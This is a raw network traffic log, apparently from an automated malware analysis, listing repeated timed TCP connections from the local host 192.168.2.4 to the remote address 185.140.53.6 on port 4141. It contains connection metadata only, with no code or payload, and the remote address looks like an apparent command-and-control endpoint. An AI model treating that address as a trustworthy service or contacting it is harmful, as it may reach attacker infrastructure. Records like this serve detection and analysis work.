Jan 24, 2022 02:24:39.027606010 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.027632952 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.027653933 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.027689934 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.027729034 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.027741909 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.114506960 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.114573002 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.114648104 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.114703894 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.114970922 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.115108967 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.115176916 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.115255117 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.115474939 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.115552902 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.115881920 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.115948915 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.174792051 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.174853086 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.174916983 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.174967051 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.206656933 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.207770109 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.245146990 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.245316029 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.251425982 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.251528025 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.251646042 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.251745939 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.252021074 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.252074957 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.252114058 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.252130032 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.252171040 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.252187014 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.252223969 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.252243996 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.252274990 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.252302885 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.252331018 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.252358913 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.252393961 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.252407074 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.252445936 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.252500057 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.263334990 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.273536921 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.273648977 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.280272961 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.280375004 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.302191973 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.302228928 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.302274942 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.302306890 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.302834034 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.302910089 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.323220015 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.323353052 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.346334934 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.346447945 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.346462011 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.346529007 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.346590042 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.346642971 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.346664906 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.346700907 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.348185062 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.348247051 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.360683918 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.360717058 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.360774040 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.360857964 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.362633944 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.362735033 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.363343000 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.363424063 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.363456964 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.363537073 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.363562107 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.363586903 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.363734961 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.363816977 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.363861084 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.363918066 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.364180088 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.364253998 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.364253998 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.364322901 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.364331007 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.364419937 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.364423037 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.364504099 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.364649057 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.364667892 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.364708900 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.364728928 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.383245945 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.383276939 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.383354902 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.383440971 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.383517981 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:39.383569002 CET	4141	49750	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:39.383642912 CET	49750	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:43.327009916 CET	49757	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:43.427885056 CET	4141	49757	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:43.427999020 CET	49757	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:43.429089069 CET	49757	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:43.663881063 CET	4141	49757	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:43.664010048 CET	49757	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:43.942087889 CET	4141	49757	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:43.942183018 CET	49757	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:44.049165010 CET	4141	49757	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:44.049268007 CET	49757	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:44.362993956 CET	4141	49757	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:44.363816977 CET	49757	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:44.676683903 CET	4141	49757	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:44.682086945 CET	49757	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:44.976146936 CET	4141	49757	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:44.976308107 CET	49757	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:45.253715038 CET	4141	49757	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:45.356730938 CET	49757	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:45.650305986 CET	4141	49757	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:45.650461912 CET	49757	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:45.936439991 CET	4141	49757	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:46.112698078 CET	49757	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:46.307492971 CET	49757	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:46.394717932 CET	4141	49757	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:46.394824982 CET	49757	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:50.368521929 CET	49760	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:50.485444069 CET	4141	49760	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:50.486534119 CET	49760	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:50.487020016 CET	49760	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:50.722337961 CET	4141	49760	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:50.722676992 CET	49760	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:51.003890038 CET	4141	49760	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:51.005784035 CET	49760	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:51.083693981 CET	4141	49760	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:51.083801985 CET	49760	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:51.429438114 CET	4141	49760	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:51.429574013 CET	49760	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:51.497833014 CET	49760	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:51.590321064 CET	4141	49760	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:52.029088020 CET	49760	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:52.113140106 CET	4141	49760	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:52.123368979 CET	49760	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:52.193114042 CET	4141	49760	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:52.194752932 CET	49760	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:52.295512915 CET	49760	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:52.312330008 CET	4141	49760	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:52.312418938 CET	4141	49760	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:52.312434912 CET	49760	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:52.312484980 CET	49760	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:56.380264044 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:56.458019972 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:56.458558083 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:56.459194899 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:56.669147015 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:56.669284105 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:56.974210024 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:56.979274988 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:57.077589989 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:57.078526974 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:57.368175030 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:57.368356943 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:57.667697906 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:57.667825937 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:57.884011984 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:57.884057999 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:57.884102106 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:57.884130955 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:58.004960060 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.004996061 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.005086899 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:58.005223989 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.005295038 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:58.005348921 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.005458117 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:58.114811897 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.114869118 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.114917040 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:58.114939928 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:58.117283106 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.117361069 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:58.118033886 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.118110895 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:58.118588924 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.118665934 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:58.118987083 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.119061947 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:58.119199038 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.119271040 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:58.135512114 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.135618925 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:58.227009058 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.227056980 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.227129936 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:58.227153063 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:58.230164051 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.230245113 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:58.231482029 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.231560946 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:58.262813091 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.262841940 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.262862921 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.262877941 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:58.262898922 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:58.262922049 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:58.262981892 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.263041973 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:58.263118029 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.263171911 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:58.281258106 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:58.312982082 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.313056946 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.313102961 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:58.313133955 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:58.313177109 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.313220024 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.313239098 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:58.313275099 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:58.313358068 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.313427925 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:58.313925982 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.313971043 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.314083099 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:58.314698935 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.314747095 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.314790010 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.314841986 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.314857960 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:58.314867020 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:58.314892054 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:58.314929008 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.314985991 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:58.316462040 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.316509008 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.316602945 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:58.316656113 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.316715956 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:58.376971006 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.377027035 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.377060890 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:58.377123117 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.377136946 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:58.377170086 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:58.377206087 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.377253056 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.377274990 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:58.377305031 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:58.377329111 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.377412081 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:58.382419109 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.382486105 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:58.386871099 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.386912107 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.386949062 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:58.386981010 CET	4141	49767	185.140.53.6	192.168.2.4
Jan 24, 2022 02:24:58.386992931 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:24:58.387032986 CET	49767	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:02.432852030 CET	49774	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:02.520276070 CET	4141	49774	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:02.523679972 CET	49774	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:02.524995089 CET	49774	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:02.740511894 CET	4141	49774	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:02.795643091 CET	49774	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:03.059187889 CET	49774	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:03.252444983 CET	4141	49774	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:03.252552032 CET	49774	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:03.552453041 CET	4141	49774	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:03.552542925 CET	49774	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:03.856410980 CET	4141	49774	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:03.856538057 CET	49774	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:04.151529074 CET	4141	49774	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:04.151695967 CET	49774	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:04.485048056 CET	4141	49774	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:04.485615969 CET	49774	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:04.802146912 CET	4141	49774	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:04.802284002 CET	49774	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:04.843204975 CET	49774	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:08.909041882 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:08.991251945 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:08.993172884 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:08.993737936 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:09.197350025 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:09.197468042 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:09.480386019 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:09.480475903 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:09.566212893 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:09.608647108 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:09.624562979 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:09.916590929 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:09.916716099 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.141670942 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.141786098 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.142817974 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.142894030 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.232790947 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.233354092 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.233393908 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.233460903 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.233695030 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.233756065 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.265347958 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.370759964 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.370820999 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.370861053 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.370908976 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.370933056 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.370944977 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.372203112 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.374588966 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.374675035 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.376411915 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.376455069 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.376472950 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.376504898 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.376550913 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.376605988 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.461359024 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.461947918 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.462030888 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.462201118 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.463074923 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.463201046 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.463752985 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.464096069 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.464153051 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.464716911 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.465941906 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.466001987 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.466238022 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.467788935 CET	4141	49777	185.140.53.6	192.168.2.4
